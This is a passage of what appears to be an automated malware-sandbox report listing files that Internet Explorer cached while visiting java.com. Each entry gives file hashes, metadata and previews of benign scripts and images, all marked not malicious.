                                                                                                                                                                                  Preview: var s=s_gi(s_account,1);s.dynamicAccountSelection=sun_dynamicAccountSelection,s.dynamicAccountList=sun_dynamicAccountList,s.trackDownloadLinks=!0,s.trackExternalLinks=!0,s.trackInlineStats=!0,s.linkDownloadFileTypes="exe,zip,wav,mp3,mov,mpg,avi,doc,pdf,xls,bin,tar,Z,gz,txt,bz2,mp4,jar,dmg,sh,msi,jnlp",s.linkInternalFilters="javascript:,sun.com,java.com,opensolaris.org,sun-catalogue.com,java.net,netbeans.org,openmediacommons.org,sunspotworld.com,openoffice.org,opensparc.net,sunsource.net,opensolaris.com,mysql.com,mysql.de,mysql.fr,projectdarkstar.com,sunstudentcourses.com,kenai.com,virtualbox.org,odftoolkit.org,javafx.com,openoffice.bouncer.osuosl.org,opends.org,suntrainingcatalogue.com,cloudoffice.com",s.linkLeaveQueryString=!1,"undefined"==typeof ltv||""==ltv?s.linkTrackVars="None":s.linkTrackVars=ltv,"undefined"==typeof lte||""==lte?s.linkTrackEvents="None":s.linkTrackEvents=lte;var s_prop33="Version06032013",s_server=location.hostname,s_eVar35=location.href;s_eVar35=(s_eVar35=s_eVar
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\notice[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8929
                                                                                                                                                                                  Entropy (8bit):5.410329350680202
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:57TGITdVKY0GASJ7MF1fpem4T2J1tvFnj1E6mnNUy3cr:BGS97ASJ3T2JFnj6NUy3cr
                                                                                                                                                                                  MD5:0FE49EF9F538E6269DB10F9252675236
                                                                                                                                                                                  SHA1:477E7C7547BB1B41D8ECA0A5874E513BB1939C1A
                                                                                                                                                                                  SHA-256:3BE11544451643FD5750391DE4723874601F17FA3D12E55EC7408AA8064495FD
                                                                                                                                                                                  SHA-512:A8EFAE9E134D018C814A81AB92AB5210C798AB26F601812937C1BA4E24AF2F6B90E9DF1F18CA6F4487B95C6D188AFF61DC95D8434B8E0597769377EAFB5337BF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: function _truste_eumap(){truste=self.truste||{};truste.eu||(truste.eu={});truste.util||(truste.util={});.(new Image(1,1)).src=("https://consent.trustarc.com/log".replace("http:","https:"))+"?domain=oracle.com&country=ch&state=&behavior=expressed&c="+(((1+Math.random())*65536)|0).toString(16).substring(1);.truste.util.error=function(l,h,k){k=k||{};var j=h&&h.toString()||"",e=k.caller||"";if(h&&h.stack){j+="\n"+h.stack.match(/(@|at)[^\n\r\t]*/)[0]+"\n"+h.stack.match(/(@|at)[^\n\r\t]*$/)[0].}truste.util.trace(l,j,k);if(truste.util.debug||!h&&!l){return}var d={apigwlambdaUrl:"https://api-js-log.trustarc.com/error",enableJsLog:false};.if(d.enableJsLog){delete k.caller;delete k.mod;delete k.domain;delete k.authority;k.msg=l;var i=new (self.XMLHttpRequest||self.XDomainRequest||self.ActiveXObject)("MSXML2.XMLHTTP.3.0");.i.open("POST",d.apigwlambdaUrl,true);i.setRequestHeader&&i.setRequestHeader("Content-type","application/json");.i.send(truste.util.getJSON({info:truste.util.getJSON(k)||"",erro
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\promise-polyfill.min[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):3873
                                                                                                                                                                                  Entropy (8bit):4.934703049448279
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:2sGCUBf6HofDX3Z3QL8t5wvDhk98ez8UX9afVBKkfSqiOH:s68l3sayVKzBNaB6q5
                                                                                                                                                                                  MD5:7ECB657D16B1441F47B83F777AC75DCF
                                                                                                                                                                                  SHA1:EF2F2A0DD519D2D1CE8D15B00352C26E6BB65762
                                                                                                                                                                                  SHA-256:E17AE17F90AE983832F3709E67DE0F7902FE1014568410534615235A158D7AF0
                                                                                                                                                                                  SHA-512:60AF9B02352E61D8CF92C6C6408208B149F9860605B1CFA75E0C76D56C1BCBD32FFAB25DF16647D8545ED517654E316ED6FC651A26BDFD1AA650C719B57F81AC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/promise-polyfill.min.js
                                                                                                                                                                                  Preview: !function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t():"function"==typeof define&&define.amd?define(t):t()}(0,function(){"use strict";function e(e){var t=this.constructor;return this.then(function(n){return t.resolve(e()).then(function(){return n})},function(n){return t.resolve(e()).then(function(){return t.reject(n)})})}function t(e){return new this(function(t,n){function o(e,n){if(n&&("object"==typeof n||"function"==typeof n)){var f=n.then;if("function"==typeof f)return void f.call(n,function(t){o(e,t)},function(n){r[e]={status:"rejected",reason:n},0==--i&&t(r)})}r[e]={status:"fulfilled",value:n},0==--i&&t(r)}if(!e||"undefined"==typeof e.length)return n(new TypeError(typeof e+" "+e+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(e);if(0===r.length)return t([]);for(var i=r.length,f=0;r.length>f;f++)o(f,r[f])})}function n(e){return!(!e||"undefined"==typeof e.length)}function o(){}function r(e){if(!(this instanceof r))
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\render[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5443
                                                                                                                                                                                  Entropy (8bit):4.986757619365243
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:42wPg4jiZqTxEE2jSBOyOLpoVuM9gXlyVTakH:4VPgCiZWR2eBOyepoVuM9SAaW
                                                                                                                                                                                  MD5:1AB11CB35BFDFB48448EA5594C3BC5AE
                                                                                                                                                                                  SHA1:A6D9DE08907DEA946248751637E7592AF59DA9CF
                                                                                                                                                                                  SHA-256:B719089A5754F4FEC74C1A01E8AD645CBC8841C00FF1362FF31EDEC9EE7D4C1A
                                                                                                                                                                                  SHA-512:7DA26591CC62F8886F8AB76AB134594ED6899553D8C54FC2713FEB9199716026BE1FE9B75B50843505A6B3677A30852A66874ED456EB60E94A1039C1B629A523
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_2094/_compdelivery/JCOM-Header/assets/render.js
                                                                                                                                                                                  Preview: /* globals define */.define(['knockout', 'jquery', 'text!./template.html', 'i18n!nls/header'], function(ko, $, sampleComponentTemplate, head) {.'use strict';.var ComponentViewModel = function (args) {....// Boilerplate to help us store....var self = this,.....SitesSDK = args.SitesSDK;.....// Store the args. Some times we need these for various functions.....// For example the viewMode will tell you whether you are in edit or edit mode....self.mode = args.viewMode;....self.id = args.id;.....// Define the observables that we are binding....self.showLogo = ko.observable(false);....self.showNav = ko.observable(false);....self.showSearch = ko.observable(false);....self.navLinks = ko.observableArray([]);....self.srchDefault = head.Search;.....// Define any computed functions, which are essentially read only observables.....// This computed function returns the url of the image we were passed......self.resetNav = function() {.....self.renderNav();....};.....self.renderNav = function() {.....s
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\render[2].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:exported SGML document, UTF-8 Unicode text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):9798
                                                                                                                                                                                  Entropy (8bit):4.822811148672577
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:TN4cGGvCMLnJUp5faTF7TkSbGibbc1F0MUJhE24o5sRXqMzXpsvo9LM9dqIC:TNuC+gJTmB8J4mvE5
                                                                                                                                                                                  MD5:CDA175F1776F94D8025CF4B6578D5EDB
                                                                                                                                                                                  SHA1:A9E38E986A90632E63007E6F77DB0CD055F64442
                                                                                                                                                                                  SHA-256:610CEE97B15F5669A733F0802726988EA641C103C10AFAAA7353D2C6C3878840
                                                                                                                                                                                  SHA-512:A9B691A6D6708C83D5A27783F8C8BD6223056DB2149DC25FAA2137B52FE45C075099D33EDA5A18BB0B6AAF80E515CDD156E3929FF8A6A2BF50D4B9072609255E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_compdelivery/_cache_2094/JCOM-SimplePage_Detail/assets/render.js
                                                                                                                                                                                  Preview: /**. * Copyright (c) 2019 Oracle and/or its affiliates. All rights reserved.. * Licensed under the Universal Permissive License v 1.0 as shown at http://oss.oracle.com/licenses/upl.. */./* globals define,console */.define([.."jquery",.."mustache",.."marked",.."text!./layout.html".], function ($, Mustache, Marked, templateHtml) {.."use strict";...// Content Layout constructor function...function ContentLayout(params) {...this.contentItemData = params.contentItemData || {};...this.scsData = params.scsData;...this.contentClient = params.contentClient;..}...// Helper function to format a date field by locale...function dateToMDY(date) {...if (!date) {....return "";...}....var dateObj = new Date(date);....var options = {....year: "numeric",....month: "long",....day: "numeric",....hour: "2-digit",....minute: "2-digit"...};...var formattedDate = dateObj.toLocaleDateString("en-US", options);....return formattedDate;..}...// Helper function to parse markdown text...function parseMarkdown(mdText
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0D070042D9C67A68E1A4BF804E6E0E06.cache[1].htm
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):143674
                                                                                                                                                                                  Entropy (8bit):5.662246051762384
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:MMH1ozeBNX2WU4PTUMMgy14K7ogRqhwiwRJDE9H:B1ozeBNX214L9xulRJDQH
                                                                                                                                                                                  MD5:EA3D9DEE0B9B737078D1EB9F46713421
                                                                                                                                                                                  SHA1:DF7F48656D226F77A826712F3533D52D1423C06F
                                                                                                                                                                                  SHA-256:807ACD2AD6A0DA69A1EEA36DB0C1E36744F3EB3D279291001B403FE58C7854A2
                                                                                                                                                                                  SHA-512:04F7C62525E708081A8AF31A950BE4A0466F3B229FDB15952DA30AE39EC4E9E302C018D281575AF14511CBC56EC828836C3270860F133E84A1AEAA78FFB7EE1B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent-pref.trustarc.com/defaultpreferencemanager/0D070042D9C67A68E1A4BF804E6E0E06.cache.html
                                                                                                                                                                                  Preview: <!doctype html>.<html><head><meta charset="UTF-8" /><script>var $gwt_version = "2.5.1";var $wnd = parent;var $doc = $wnd.document;var $moduleName, $moduleBase;var $strongName = '0D070042D9C67A68E1A4BF804E6E0E06';function __gwtStartLoadingFragment(frag) { return $moduleBase + 'deferredjs/' + $strongName + '/' + frag + '.cache.js';};function __gwtInstallCode(code) {var head = document.getElementsByTagName('head').item(0);var script = document.createElement('script');script.type = 'text/javascript';script.text = code;head.appendChild(script);};var $stats = $wnd.__gwtStatsEvent ? function(a) {return $wnd.__gwtStatsEvent(a);} : null,$sessionId = $wnd.__gwtStatsSessionId ? $wnd.__gwtStatsSessionId : null;$stats && $stats({moduleName:'defaultpreferencemanager',sessionId:$sessionId,subSystem:'startup',evtGroup:'moduleStartup',millis:(new Date()).getTime(),type:'moduleEvalStart'});</script></head><body><script> .function Pj(){}.function P_(){}.function nk(){}.function $q(){}.function zt(){
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\JavaAlice[1].jpg
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 125x132, frames 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):3811
                                                                                                                                                                                  Entropy (8bit):7.850192369179497
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:YaKeVfWUtV7GNVz9Bu8Qydxh6zzvupXg8B:LfWUniNV5h6zzvYXg8B
                                                                                                                                                                                  MD5:F26405E1D9347863352B5E7CEA270155
                                                                                                                                                                                  SHA1:192894C813979D6ADB08BD2BECE0D0A5DEBFE96A
                                                                                                                                                                                  SHA-256:70145461B9DD7661B2FDE95B572262B9A4AC4044FF9C4D99450A5B1CEC93A1CA
                                                                                                                                                                                  SHA-512:94F753BA1F9E6512700DDAA6CD8559109C31B55C2A4B546A5708F75D5CADC175AF1CB438498FE62E94192EFC45B1F88097F4A27CC74340BCCD3EBF45FA12C6CC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/content/published/api/v1.1/assets/CONT9D14685A7F0F4C7782D8B91D06E60E37/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
                                                                                                                                                                                  Preview: ......JFIF.....d.d.....C..............................................!........."$".$.......C.........................................................................}..!........................................E..........................!....1Aq"3QRUVa.....246su...#$r...B.S...................................0.......................1..!A.Qa."q..#.......B.............?..J.:e..x...%.[m...8..NV.r.u.^O;.......o...N.'......i..y.u.c|..Y....y.u.c|.ry.p]}X.&.....w.._V7.'......i.....y.u.c|.ry.p]}X.&.....w.._V7.'......i.....y.u.c|.ry.p]}X.&...1....$w..";.(}-.-.h.....t.'hdU*..'j....?n.o...[.T...........8..Gf..)>.j..zOed.:!.\..r.......;..qLT...........8..v_...f.....VOs....O./?.~....c.D.P.H.R..i..$a..m.+s.x..#......$o..Uu't..Bc...z.....<|.!;.:#<=OySe..e*.R......N.k.h..f..$#.<.........u.A.e.E......\.Q...#.....88.."..........R}........tCb.i!2.JQ.E..O@.....oN^e.Q?.DEl....dxMz~..I.>...\R...s.!.\)K.c.... k...&M...q....N.^pn%j..ki.';..[4.Q........^....n.b[.t\..7
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Oracleacademy(2)[1].jpg
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 125x132, frames 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):4900
                                                                                                                                                                                  Entropy (8bit):7.90049937566647
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:XLElCYEO3u1fQ8i0id8UIu3HOwqi/PxbCvGTGK9Q5Sr0gwFC7ofJK:X4lCYEYu148fyuwr0v8ZGpFSofJK
                                                                                                                                                                                  MD5:CFE0F1B70C44984498BCBB32E3913E28
                                                                                                                                                                                  SHA1:4C71674AB77C183746263886A86051DD6DC7C3DB
                                                                                                                                                                                  SHA-256:3A09A1B1EA0D785CA29174C25AF6F42656831898E9B09FC0B2AFB25A5E82A068
                                                                                                                                                                                  SHA-512:58B02CF5537D7776468D010992589A57B64DA47ABEF45FD92F83A3423366E5C94D48903216A10A6401634FD7C0E2047D8DE4A014BD258414250675E6E252C56B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/content/published/api/v1.1/assets/CONT862DE06B4B724C38B1F5D3FA3EB08BFB/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
                                                                                                                                                                                  Preview: ......JFIF.............C..............................................!........."$".$.......C.........................................................................}..!.........................................X...........................!1...."AQaq...#25BSUt.....$RTbrs.......%3C......467Dcu.....................................3.........................!.1Q.A..."BSTq.......a..............?..v..<....1.R]e......1.I+a.K.1.*5.......X.S..M,.x.u..:=4.....7....K;.;..c}N.M,.x.u..:........X.S..K;.;..c}N.=4.....7....N....X.S.$....w.%.[:v.k...\d..g..u0\..O.y..."5...k9...Q...Q...p;..q@qj.j.V.s...c............%>^.@w...k.n.b..[..u..1..j.)&.A.%..."V..nO.&+%.1...i.....4.0....Z*Y.*?f.v....4..4.E.Q@.P..WN_5M.N...Ls.m'..Q<... U...cm....:......`....{...(G.....%K..Z..t...)..iI.$...O....\..vk.=.e.s.....8...z..@.i....$..+.,..@........'....B.6.A.6.4.HD.....a.s.A..hQ.e.=..U3`.pfz..2Tw.IASJDD..J....9q..r......7[f..7gK...1...o....%......+a.-9.d'.Z.^g^."T..;[...y..9..N?
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cookie_inneriframe[1].htm
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):2008
                                                                                                                                                                                  Entropy (8bit):5.157980344637123
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:R+AWZDXeNYhGtcO4S63v0SaATPsLXQa+/NT:GbcciSaATkLgV
                                                                                                                                                                                  MD5:D09BEB4594BA45F809C9DB7E4429551B
                                                                                                                                                                                  SHA1:6E2D0D8C237175DB1509E707B7166042D65C694B
                                                                                                                                                                                  SHA-256:A2DE091C86C5A7B6DCC572EB6E5A76C2CD72CE27A2042A8DC2974F15B33566ED
                                                                                                                                                                                  SHA-512:2D5373C167742FFB7654D528BE59029BB930221588A49B27FD3AF17EB9457EC6E41D76F1C040BF21E35A8E94B372AE5F87E95B91C4EB5F70CFFF584B314DCFF0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent-pref.trustarc.com/cookie_inneriframe.html
                                                                                                                                                                                  Preview: <html>.<body>.<script type="text/javascript">. function getSameSiteValue(){. var isHttps = ((self.location.protocol == "https:") ? " Secure;" : ""); //conditionally adds Secure tag only if parent frame is HTTPS. var sameSiteValue = isHttps ? "None;" : "Lax;";. var cookieAttrb = (" SameSite=" + sameSiteValue) + isHttps;. return cookieAttrb;. }...function sameSiteCompatible(userAgent){...return !hasWebKitSameSiteBug(userAgent);..}...function hasWebKitSameSiteBug(userAgent){...return isIosVersion(12, userAgent) || (checkMacOSVersion(userAgent) && checkIfSafariBrowser(userAgent)) || checkChromeVersion(userAgent);..}...function isIosVersion(major, userAgent){...var retVal = true;....var start = userAgent.indexOf('OS');...if( ( userAgent.indexOf('iPhone') > -1 || userAgent.indexOf('iPad') > -1 ) && start > -1 ){....var iosVersion = window.Number( userAgent.substr( start + 3, 3 ).replace( '_', '.'));.....if(iosVersion > major){.....retVal = false;....}...}els
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\en[1].htm
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):7868
                                                                                                                                                                                  Entropy (8bit):5.955885351258973
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:EwvXRwOI5C0n1YxSLZ99wjLUQLaBuutK/CvVlYV25q:EwvXRwXC0n1YcL9we4oVl0h
                                                                                                                                                                                  MD5:AED4E8184B939A91840607F42ED6AA18
                                                                                                                                                                                  SHA1:67B3DB17A0A7775C8CDFD8F144D51B758126437C
                                                                                                                                                                                  SHA-256:ECF9F6002066EFA72B94CEC9970F3F2E0658C88BD53FE88ACFADDCE46A35354E
                                                                                                                                                                                  SHA-512:30CD6C20357DBBEA4ADDCB98BDF81684101133AD5F3C827D94C2D4E0485577744ED6D10D73618E402D0D1E30CA2CE3920DBD830A0973D7094E1F44E01A05D2CF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/en/
                                                                                                                                                                                  Preview: <!DOCTYPE html>.<html>.<head>.<script type="text/javascript">.var SCSCacheKeys = {..product: '_cache_24c8',..site: '_cache_d099',..theme: '_cache_4ba9',..component: '_cache_2094',..caas: '_cache_97bc'.};.</script>.<meta http-equiv="X-UA-Compatible" content="IE=edge">.<meta name="viewport" content="initial-scale=1">.<script type="text/javascript">.var SCS = { sitesCloudCDN: 'https://static.oracle.com/cdn/cec/v21.2.1.30',.sitePrefix: '/site/JCOM/' };.</script>.<script src="https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/controller.js"></script>.. <script>(window.BOOMR_mq=window.BOOMR_mq||[]).push(["addVar",{"rua.upush":"false","rua.cpush":"false","rua.upre":"true","rua.cpre":"false","rua.uprl":"false","rua.cprl":"false","rua.cprf":"false","rua.trans":"SJ-1acddf3f-8db4-4a02-b4dc-17912945ae6d","rua.cook":"true","rua.ims":"false","rua.ufprl":"false","rua.cfprl":"false","rua.isuxp":"","rua.texp":""}]);</script>. <script>!function(e){var n="
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\footer.min[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):852
                                                                                                                                                                                  Entropy (8bit):5.239961892663503
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:xzptfQ2g9jDQkPBNIjA6hi2A6VOP8ce4+JlN8hDc+:xfQZZvIXU2Lseoc+
                                                                                                                                                                                  MD5:B75CF6F8E60B4B337B0E80BD2F7B532F
                                                                                                                                                                                  SHA1:02E01563455F45A096D55DEEA946073CA0475D50
                                                                                                                                                                                  SHA-256:ACA721CB0D61F54B47CEDA57C90777FA82ADBF68F494B5AA9F3F3D92D6AAC102
                                                                                                                                                                                  SHA-512:82299CF911C787BF3DF36E3C9ECC94E47A4D78183B5B3DDEFFED00673D356875F0736D7EECEA6F5626ADFC0B6B31E687D6354B044ECDDB6E27E67371BFAD34BF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/content/published/api/v1.1/assets/CONT32E28F7C5A8446DDA7E9CFA66A3A6DB7/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
                                                                                                                                                                                  Preview: var popupReference=null;function popFeedback(c){null==popupReference||popupReference.closed?(navigator.userAgent.match(/(IE|Internet Explorer|Trident)/)&&(c=updateQueryParam("p",location.pathname,c)),params="width=620,height=635,directories=0,location=0,menubar=0,resizable=0,scrollbars=1,status=0,toolbar=0",popupReference=window.open(c,"popup",params)):popupReference.focus();return!1}.function updateQueryParam(c,d,a){var e=RegExp("([?&])"+c+"=.*?(&|$|#)(.*)","gi"),b;if(e.test(a)){if("undefined"!==typeof d&&null!==d)return a.replace(e,"$1"+c+"="+d+"$2$3");b=a.split("#");a=b[0].replace(e,"$1$3").replace(/(&|\?)$/,"");if("undefined"!==typeof b[1]&&null!==b[1])return a+="#"+b[1]}else if("undefined"!==typeof d&&null!==d)return e=-1!==a.indexOf("?")?"&":"?",b=a.split("#"),a=b[0]+e+c+"="+d,"undefined"!==typeof b[1]&&null!==b[1]&&(a+="#"+b[1]),a};.
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\infinity_common[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):13562
                                                                                                                                                                                  Entropy (8bit):5.416978515318094
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:T2y6zJxt9uvRndnHEbsW0x+B8ccB+3qw2ERhfZR:TbJVK16w2UxZR
                                                                                                                                                                                  MD5:A9032E68F2D9591E126404046A2BC7AB
                                                                                                                                                                                  SHA1:B504627E622CCB9DFA1B6A828EA2BC2B37E80825
                                                                                                                                                                                  SHA-256:B93E3D28B7AA290C8DB2BB4E1CA75D9BD1D84E85AA867BCFA598A6B2A3D27562
                                                                                                                                                                                  SHA-512:08407843545CB9709CCA1DEEA3D95A68CAF73BC281A5F006F4499C86C7BD742EFD475533F1B9652A2F53B17F07352D5AF437FA2D085E8619CF33C2632E5D4220
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.oracle.com/asset/web/analytics/infinity_common.js
                                                                                                                                                                                  Preview: /*!.######################################################..# INFINITY_COMMON.JS..# Version: 1.16.# BUILD DATE: Friday, Feb 19, 2021..# COPYRIGHT ORACLE CORP 2021 [UNLESS STATED OTHERWISE]..######################################################.*/.var OraInfCustPluginGlobals=(function(){var publicScope={};publicScope.getUrlQueryParameter=function(name){name=name.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var regex=new RegExp("[\\?&]"+name+"=([^&#]*)");var results=regex.exec(location.search);return results===null?"":decodeURIComponent(results[1].replace(/\+/g," "));};publicScope.getHostName=function(r){if(r){var e=r.match(/\/\/(www[0-9]?\.)?(.[^/:]+)/i);return null!=e&&e.length>2&&"string"==typeof e[2]&&e[2].length>0?e[2]:null;}};publicScope.getHostObject=function(r){if(r){var e=r.match(/^(?:https?:|ftps?:)?(?:\/\/)?([^\/\?]+[.]+[\w]+[:\w]*)/i);return null!=e&&e.length>1&&"string"==typeof e[1]&&e[1].length>0?{origin:e[0],host:e[1]}:null;}};publicScope.getMetaTagValue=function(name){var
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\java_home_photo2[1].jpg
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 320x303, frames 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):18684
                                                                                                                                                                                  Entropy (8bit):7.941482665517741
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:MD9jCVd+P1avntf3LFbzluWnanYPayLhhRgBuTAzZ4:Y9jCPOgvtf3LFbhuVIayLRgITkZ4
                                                                                                                                                                                  MD5:F31AE0A9ACBC9D62A93E4A942C762A2D
                                                                                                                                                                                  SHA1:1F9AAFA48280BB10EC6E055C95468EC7C7AC1A58
                                                                                                                                                                                  SHA-256:61177657E9643FE669E02FE1971011EA7E1159D42ECC80F1C0E36BA505AD1416
                                                                                                                                                                                  SHA-512:3710959B8CADAC9B3B4C0B9D08B7663391404C952124D5FE85E4F1F1DF0E36E5641BBD92481D4F4D8F9CBE3EC46C99FE35048413C007A3F627B2AA2BDB8FDEB0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/home/java_home_photo2.jpg
                                                                                                                                                                                  Preview: ......JFIF.....d.d......Ducky.......K.....&Adobe.d.......................0...H............................................................................................................................................./.@.......................................................................................... 1..0@!.P"2.A#..`$B3pC%.......................!1AQ..q"0@a.2B.#. ..R..br.3C..$.P...Scs4....................P`!....................!1A.Qa@q. 0..P..........................F.e]3...-6.3.#1p.Js............:.]9.t....s[\....J...zc....4...............p[1...<6.v../+y..M~....b...........j[.e.3.h:gazzF..;c.K.2...21={-;=..:eP........A.K..8.u.n"m&!..&.c..C;.<...n]..............Zo..s....d...lmH.!.........c.f}.l..........W...e.o.>.._;.Jf&..e*=,f..../....\$........[#.SO...t....1..le...X.V.^D.QRi..g}..GL3R...........\;4M.."....s....|r..R.:..f.\Rz.>.............n|.O...jS..q.d3./.>..;.1{.L......>..Io..M...........M>z...v.[u?/..p....4.\.W.+l,oK.^...>.[\.........h|..O .*
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\notice[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):8929
                                                                                                                                                                                  Entropy (8bit):5.410329350680202
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:57TGITdVKY0GASJ7MF1fpem4T2J1tvFnj1E6mnNUy3cr:BGS97ASJ3T2JFnj6NUy3cr
                                                                                                                                                                                  MD5:0FE49EF9F538E6269DB10F9252675236
                                                                                                                                                                                  SHA1:477E7C7547BB1B41D8ECA0A5874E513BB1939C1A
                                                                                                                                                                                  SHA-256:3BE11544451643FD5750391DE4723874601F17FA3D12E55EC7408AA8064495FD
                                                                                                                                                                                  SHA-512:A8EFAE9E134D018C814A81AB92AB5210C798AB26F601812937C1BA4E24AF2F6B90E9DF1F18CA6F4487B95C6D188AFF61DC95D8434B8E0597769377EAFB5337BF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent.trustarc.com/notice?domain=oracle.com&c=teconsent&js=bb&noticeType=bb&text=true&gtm=1&language=en
